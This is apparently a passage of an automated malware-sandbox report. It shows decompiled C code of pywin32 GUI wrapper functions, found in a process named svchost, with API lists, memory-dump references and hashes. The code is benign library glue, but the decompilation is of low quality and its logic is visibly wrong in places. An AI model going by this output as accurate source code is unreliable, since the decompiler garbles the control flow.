                            					_t7 =  &_v8;
                            					__imp__?PyWinObject_AsPOINT@@YAHPAU_object@@PAUtagPOINT@@@Z(_v12, _t7);
                            					if(_t7 == 0) {
                            						goto L1;
                            					} else {
                            						__imp__PyEval_SaveThread(_t10, _t14);
                            						SetLastError(0);
                            						_t9 = WindowFromPoint(_v8);
                            						_t11 = _t9;
                            						__imp__PyEval_RestoreThread(_t7, _v8.y);
                            						if(_t11 != 0) {
                            							L6:
                            							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t11);
                            							return _t9;
                            						} else {
                            							_t9 = GetLastError();
                            							if(_t9 == 0) {
                            								goto L6;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("WindowFromPoint", _t9);
                            								return _t9;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}












                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:WindowFromPoint), ref: 6DAB80E7
                            • ?PyWinObject_AsPOINT@@YAHPAU_object@@PAUtagPOINT@@@Z.PYWINTYPES38(?,?), ref: 6DAB8103
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB8112
                            • SetLastError.KERNEL32(00000000), ref: 6DAB811C
                            • WindowFromPoint.USER32(?,?), ref: 6DAB812A
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB8133
                            • GetLastError.KERNEL32 ref: 6DAB8140
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(WindowFromPoint,00000000), ref: 6DAB8150
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@FromObject_ParsePointRestoreSaveT@@@TupleUtagWin_Window
                            • String ID: O:WindowFromPoint$WindowFromPoint
                            • API String ID: 3537070314-1666126683
                            • Opcode ID: 52e01b2cd298ab18c47fe2326a6176857c4d3ea474c93852e5af41fd165cc0a2
                            • Instruction ID: 5178c8f3697323c87afeee65903b3c747dd7955c86fcc2d1a10d274958dfa8f1
                            • Opcode Fuzzy Hash: 52e01b2cd298ab18c47fe2326a6176857c4d3ea474c93852e5af41fd165cc0a2
                            • Instruction Fuzzy Hash: 1A0196755083029FDF009F28AC8977A3BB8FF81201F488538FD55C0121E736856BDA97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAB0DE0(intOrPtr _a8) {
                            				struct HWND__* _v4;
                            				long _v8;
                            				long* _t5;
                            				struct HWND__** _t6;
                            				long _t8;
                            				void* _t9;
                            				long _t10;
                            				void* _t13;
                            
                            				_t5 =  &_v8;
                            				_v8 = 0;
                            				__imp__PyArg_ParseTuple(_a8, "O:GetDC", _t5);
                            				if(_t5 != 0) {
                            					_t6 =  &_v4;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v8, _t6);
                            					if(_t6 == 0) {
                            						goto L1;
                            					} else {
                            						__imp__PyEval_SaveThread(_t9, _t13);
                            						SetLastError(0);
                            						_t8 = GetDC(_v4);
                            						_t10 = _t8;
                            						__imp__PyEval_RestoreThread(_t6);
                            						if(_t10 != 0) {
                            							L6:
                            							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t10);
                            							return _t8;
                            						} else {
                            							_t8 = GetLastError();
                            							if(_t8 == 0) {
                            								goto L6;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetDC", _t8);
                            								return _t8;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetDC), ref: 6DAB0DF7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB0E13
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB0E22
                            • SetLastError.KERNEL32(00000000), ref: 6DAB0E2C
                            • GetDC.USER32(?), ref: 6DAB0E36
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB0E3F
                            • GetLastError.KERNEL32 ref: 6DAB0E4C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetDC,00000000), ref: 6DAB0E5C
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleWin_
                            • String ID: GetDC$O:GetDC
                            • API String ID: 3963458015-3846432568
                            • Opcode ID: 4b17f8ae5273f3649a7014ea97562ec49309900bf2176953dcd8ba75674089f1
                            • Instruction ID: 4307345975578a29a3e34e85fd28a2b0a2565a8d2ae3eb1987362ccb61ce2b25
                            • Opcode Fuzzy Hash: 4b17f8ae5273f3649a7014ea97562ec49309900bf2176953dcd8ba75674089f1
                            • Instruction Fuzzy Hash: CD01B175508201AFDF006B69AD8976B3BBCEF82252F488534F845C0121F735896BCAA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAB5D00(intOrPtr _a8) {
                            				struct HDC__* _v4;
                            				long _v8;
                            				long* _t5;
                            				struct HDC__** _t6;
                            				long _t8;
                            				void* _t9;
                            				long _t10;
                            				void* _t13;
                            
                            				_t5 =  &_v8;
                            				_v8 = 0;
                            				__imp__PyArg_ParseTuple(_a8, "O:WindowFromDC", _t5);
                            				if(_t5 != 0) {
                            					_t6 =  &_v4;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v8, _t6);
                            					if(_t6 == 0) {
                            						goto L1;
                            					} else {
                            						__imp__PyEval_SaveThread(_t9, _t13);
                            						SetLastError(0);
                            						_t8 = WindowFromDC(_v4);
                            						_t10 = _t8;
                            						__imp__PyEval_RestoreThread(_t6);
                            						if(_t10 != 0) {
                            							L6:
                            							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t10);
                            							return _t8;
                            						} else {
                            							_t8 = GetLastError();
                            							if(_t8 == 0) {
                            								goto L6;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("WindowFromDC", _t8);
                            								return _t8;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:WindowFromDC), ref: 6DAB5D17
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB5D33
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB5D42
                            • SetLastError.KERNEL32(00000000), ref: 6DAB5D4C
                            • WindowFromDC.USER32(?), ref: 6DAB5D56
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB5D5F
                            • GetLastError.KERNEL32 ref: 6DAB5D6C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(WindowFromDC,00000000), ref: 6DAB5D7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@FromObject_ParseRestoreSaveTupleWin_Window
                            • String ID: O:WindowFromDC$WindowFromDC
                            • API String ID: 436854260-2255382291
                            • Opcode ID: 69ade1053f9fff412c4cb7c7e4166ed9199b0a2b3063e9e87f8fedf8b26c5a44
                            • Instruction ID: 4bf93b1dbb9a16eb53e57997938b2f3006ebd7dbaec00f8495cd2da46879c6e1
                            • Opcode Fuzzy Hash: 69ade1053f9fff412c4cb7c7e4166ed9199b0a2b3063e9e87f8fedf8b26c5a44
                            • Instruction Fuzzy Hash: B00152355082015FDF006B65EC8D7BA3BBCEF85612F488638F955C1121E736856BDAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAB0880(intOrPtr _a8) {
                            				struct HWND__* _v4;
                            				long _v8;
                            				long* _t5;
                            				struct HWND__** _t6;
                            				long _t8;
                            				void* _t9;
                            				long _t10;
                            				void* _t13;
                            
                            				_t5 =  &_v8;
                            				_v8 = 0;
                            				__imp__PyArg_ParseTuple(_a8, "O:SetFocus", _t5);
                            				if(_t5 != 0) {
                            					_t6 =  &_v4;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v8, _t6);
                            					if(_t6 == 0) {
                            						goto L1;
                            					} else {
                            						__imp__PyEval_SaveThread(_t9, _t13);
                            						SetLastError(0);
                            						_t8 = SetFocus(_v4);
                            						_t10 = _t8;
                            						__imp__PyEval_RestoreThread(_t6);
                            						if(_t10 != 0) {
                            							L6:
                            							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t10);
                            							return _t8;
                            						} else {
                            							_t8 = GetLastError();
                            							if(_t8 == 0) {
                            								goto L6;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("SetFocus", _t8);
                            								return _t8;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:SetFocus), ref: 6DAB0897
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB08B3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB08C2
                            • SetLastError.KERNEL32(00000000), ref: 6DAB08CC
                            • SetFocus.USER32(?), ref: 6DAB08D6
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB08DF
                            • GetLastError.KERNEL32 ref: 6DAB08EC
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetFocus,00000000), ref: 6DAB08FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@FocusObject_ParseRestoreSaveTupleWin_
                            • String ID: O:SetFocus$SetFocus
                            • API String ID: 2080544845-383749740
                            • Opcode ID: 84a1a7cb63105060904f05d275b5746c56363869c2cc1655cec76ddfa0a9d2fa
                            • Instruction ID: 2bab7cdbcea4942f4ef3223e084d3f1d4dfb10f9ddc049be820c7d5942f95759
                            • Opcode Fuzzy Hash: 84a1a7cb63105060904f05d275b5746c56363869c2cc1655cec76ddfa0a9d2fa
                            • Instruction Fuzzy Hash: C20192355082019FDF006B65AD8976A3AB8FF82212F484534F945C0121F735856BDAA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAAE820(intOrPtr _a8) {
                            				struct HICON__* _v4;
                            				long _v8;
                            				long* _t5;
                            				struct HICON__** _t6;
                            				long _t8;
                            				void* _t9;
                            				long _t10;
                            				void* _t13;
                            
                            				_t5 =  &_v8;
                            				_v8 = 0;
                            				__imp__PyArg_ParseTuple(_a8, "O:CopyIcon", _t5);
                            				if(_t5 != 0) {
                            					_t6 =  &_v4;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v8, _t6);
                            					if(_t6 == 0) {
                            						goto L1;
                            					} else {
                            						__imp__PyEval_SaveThread(_t9, _t13);
                            						SetLastError(0);
                            						_t8 = CopyIcon(_v4);
                            						_t10 = _t8;
                            						__imp__PyEval_RestoreThread(_t6);
                            						if(_t10 != 0) {
                            							L6:
                            							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t10);
                            							return _t8;
                            						} else {
                            							_t8 = GetLastError();
                            							if(_t8 == 0) {
                            								goto L6;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CopyIcon", _t8);
                            								return _t8;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CopyIcon), ref: 6DAAE837
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE853
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAE862
                            • SetLastError.KERNEL32(00000000), ref: 6DAAE86C
                            • CopyIcon.USER32 ref: 6DAAE876
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAE87F
                            • GetLastError.KERNEL32 ref: 6DAAE88C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CopyIcon,00000000), ref: 6DAAE89C
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_CopyError@@IconObject_ParseRestoreSaveTupleWin_
                            • String ID: CopyIcon$O:CopyIcon
                            • API String ID: 2495843093-3298496335
                            • Opcode ID: 4872673fd21b436247dbc0d716b9912d8380bcf9718f3681f24928d056f9837b
                            • Instruction ID: f4bd78f7d442d15c8998a6ff9e6e73ff8bfa90884decaf189201c25e738d338e
                            • Opcode Fuzzy Hash: 4872673fd21b436247dbc0d716b9912d8380bcf9718f3681f24928d056f9837b
                            • Instruction Fuzzy Hash: A9019235508201AFDF006B24ED8977A3AB8FF85216F4C4634F955C1121F735856BCAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAB1020(intOrPtr _a8) {
                            				struct HDC__* _v4;
                            				long _v8;
                            				long* _t5;
                            				struct HDC__** _t6;
                            				long _t8;
                            				void* _t9;
                            				long _t10;
                            				void* _t13;
                            
                            				_t5 =  &_v8;
                            				_v8 = 0;
                            				__imp__PyArg_ParseTuple(_a8, "O:CreateCompatibleDC", _t5);
                            				if(_t5 != 0) {
                            					_t6 =  &_v4;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v8, _t6);
                            					if(_t6 == 0) {
                            						goto L1;
                            					} else {
                            						__imp__PyEval_SaveThread(_t9, _t13);
                            						SetLastError(0);
                            						_t8 = CreateCompatibleDC(_v4);
                            						_t10 = _t8;
                            						__imp__PyEval_RestoreThread(_t6);
                            						if(_t10 != 0) {
                            							L6:
                            							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t10);
                            							return _t8;
                            						} else {
                            							_t8 = GetLastError();
                            							if(_t8 == 0) {
                            								goto L6;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CreateCompatibleDC", _t8);
                            								return _t8;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CreateCompatibleDC), ref: 6DAB1037
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB1053
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB1062
                            • SetLastError.KERNEL32(00000000), ref: 6DAB106C
                            • CreateCompatibleDC.GDI32(?), ref: 6DAB1076
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB107F
                            • GetLastError.KERNEL32 ref: 6DAB108C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CreateCompatibleDC,00000000), ref: 6DAB109C
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_CompatibleCreateError@@Object_ParseRestoreSaveTupleWin_
                            • String ID: CreateCompatibleDC$O:CreateCompatibleDC
                            • API String ID: 1954511142-1011343557
                            • Opcode ID: 53a4356e5a724d4faa0830da9bec380bbc8c37f24e061d14fc38c44a7ce87a38
                            • Instruction ID: 3644c8246d68e65e1dc36a27071a4b63a2127ec7bcbb3283f8bd0e574ea0593e
                            • Opcode Fuzzy Hash: 53a4356e5a724d4faa0830da9bec380bbc8c37f24e061d14fc38c44a7ce87a38
                            • Instruction Fuzzy Hash: 5D0175355082019FDF006B29ED9977B3BBCEF81216F488534FD95C1121E735856BDAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiOiiiOi:DrawIconEx,?,?,?,?,?,?,?,?), ref: 6DAAE9E0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAEA01
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAEA13
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAEA25
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: DrawIconEx$OiiOiiiOi:DrawIconEx
                            • API String ID: 1248562531-2438314532
                            • Opcode ID: d36470dc8a0c045055dbefe9a738c8eaf935e12effc00f321f3e1e994ce2b10a
                            • Instruction ID: 3007275be352a310cca9f975a06f7d54b32528f702d64a5f5e756716193e49e3
                            • Opcode Fuzzy Hash: d36470dc8a0c045055dbefe9a738c8eaf935e12effc00f321f3e1e994ce2b10a
                            • Instruction Fuzzy Hash: 1E314F7641C305AFDB01DF54CC40EABBBFDBF88205F448A2AF994D2120E731DA199B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiOO:SetMenuItemBitmaps,?,?,?,?), ref: 6DAB397C
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB399D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB39AF
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB39C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OiiOO:SetMenuItemBitmaps$SetMenuItemBitmaps
                            • API String ID: 1248562531-3607371556
                            • Opcode ID: 283a25c9e6106d4dacd411a2ea89acf4d74fc59d199b3b9d2c70dc6a685143f4
                            • Instruction ID: 0d7bd1dfb107af837f0b0ff067f8e4eb60d5fedc2314c6ea8ae5f6491c483b2e
                            • Opcode Fuzzy Hash: 283a25c9e6106d4dacd411a2ea89acf4d74fc59d199b3b9d2c70dc6a685143f4
                            • Instruction Fuzzy Hash: 04215176408305AFDB01DF55CC85BABBBFCBF88205F484929F99491120E331D95A9BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 44%
                            			E6DAA8940(intOrPtr _a8) {
                            				struct tagMSG _v28;
                            				intOrPtr _v32;
                            				int _v36;
                            				int _v40;
                            				int* _t19;
                            				int _t21;
                            				struct HWND__* _t22;
                            				void* _t36;
                            				struct HWND__* _t37;
                            
                            				_v36 = 0;
                            				_t19 =  &_v36;
                            				_v40 = 0;
                            				__imp__PyArg_ParseTuple(_a8, "|ii:PumpWaitingMessages", _t19,  &_v40);
                            				if(_t19 != 0) {
                            					_t37 = 0;
                            					__imp__PyEval_SaveThread(_t36);
                            					_v32 = _t19;
                            					_t21 = PeekMessageW( &_v28, 0, _v36, _v40, 1);
                            					if(_t21 != 0) {
                            						while(_v28.message != 0x12) {
                            							_t22 =  *0x6dac7cd8; // 0x0
                            							if(_t22 == 0 || IsDialogMessageW(_t22,  &_v28) == 0) {
                            								TranslateMessage( &_v28);
                            								DispatchMessageW( &_v28);
                            							}
                            							_t21 = PeekMessageW( &_v28, 0, _v36, _v40, 1);
                            							if(_t21 != 0) {
                            								continue;
                            							} else {
                            							}
                            							L11:
                            							goto L12;
                            						}
                            						_t21 = _v28.wParam;
                            						_t37 =  !=  ? _t21 : 1;
                            						goto L11;
                            					}
                            					L12:
                            					__imp__PyEval_RestoreThread(_v32);
                            					__imp__?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z(_t37);
                            					return _t21;
                            				} else {
                            					return _t19;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,|ii:PumpWaitingMessages,?), ref: 6DAA8965
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA8979
                            • PeekMessageW.USER32 ref: 6DAA8993
                            • IsDialogMessageW.USER32 ref: 6DAA89C8
                            • TranslateMessage.USER32(?), ref: 6DAA89D3
                            • DispatchMessageW.USER32 ref: 6DAA89DA
                            • PeekMessageW.USER32 ref: 6DAA89ED
                            • PyEval_RestoreThread.PYTHON38(?), ref: 6DAA8A0E
                            • ?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z.PYWINTYPES38(00000000), ref: 6DAA8A15
                            Strings
                            • |ii:PumpWaitingMessages, xrefs: 6DAA895C
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Message$Eval_PeekThread$Arg_DialogDispatchFromLong_ParsePtr@@RestoreSaveTranslateTupleU_object@@Void
                            • String ID: |ii:PumpWaitingMessages
                            • API String ID: 65304543-283788920
                            • Opcode ID: 93a439c5f78cf3b41825425a5a1c6f83b4fd9ecc47175a679dc946780a1b8826
                            • Instruction ID: 7a4b79b2660d2ecc115017f9a89619d69c66f8266ed2d3e919ff9d65c88b1bc9
                            • Opcode Fuzzy Hash: 93a439c5f78cf3b41825425a5a1c6f83b4fd9ecc47175a679dc946780a1b8826
                            • Instruction Fuzzy Hash: E5216B71508306AFDB00DF65CC84B5BBBF8FF89344F448A19F54593120E731D9468B56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOlOOi:SetWaitableTimer,?,?,?,?,?,?,?), ref: 6DA92039
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA9204F
                            • ?PyWinObject_AsLARGE_INTEGER@@YAHPAU_object@@PAT_LARGE_INTEGER@@@Z.PYWINTYPES38(?,?), ref: 6DA92065
                            • PyErr_SetString.PYTHON38(6E28ED8C,This param must be None), ref: 6DA92089
                            • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,?), ref: 6DA920BA
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetWaitableTimer,00000000), ref: 6DA920CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Object_$Arg_Err_Error@@ParseR@@@StringTimerTupleWaitableWin_
                            • String ID: OOlOOi:SetWaitableTimer$SetWaitableTimer$This param must be None$This param must be None
                            • API String ID: 2028803193-3419485231
                            • Opcode ID: 304058409bd8efd9c0d9bcb3713a38c49b267b07b915a7f07df467f09f9f7808
                            • Instruction ID: cd1678b7c1677b50e54700dd1bfc3de4f6b618bc059705d16c47ee818d5d38e2
                            • Opcode Fuzzy Hash: 304058409bd8efd9c0d9bcb3713a38c49b267b07b915a7f07df467f09f9f7808
                            • Instruction Fuzzy Hash: CD2190B401C302AFDB10CF50CC44B6B7BF8BB49305F548829F8A9DA150EB75DA99CB5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyGILState_Ensure.PYTHON38 ref: 6DAA7513
                            • ?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(?,00000000), ref: 6DAA7533
                            • Py_BuildValue.PYTHON38((NO),00000000), ref: 6DAA7542
                            • PyEval_CallObjectWithKeywords.PYTHON38(?,00000000,00000000), ref: 6DAA7556
                            • _Py_Dealloc.PYTHON38(00000000), ref: 6DAA7567
                            • PyLong_AsLong.PYTHON38(00000000), ref: 6DAA757D
                            • PyErr_Occurred.PYTHON38 ref: 6DAA758D
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6DAA75A0
                            • PyGILState_Release.PYTHON38(?), ref: 6DAA75B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
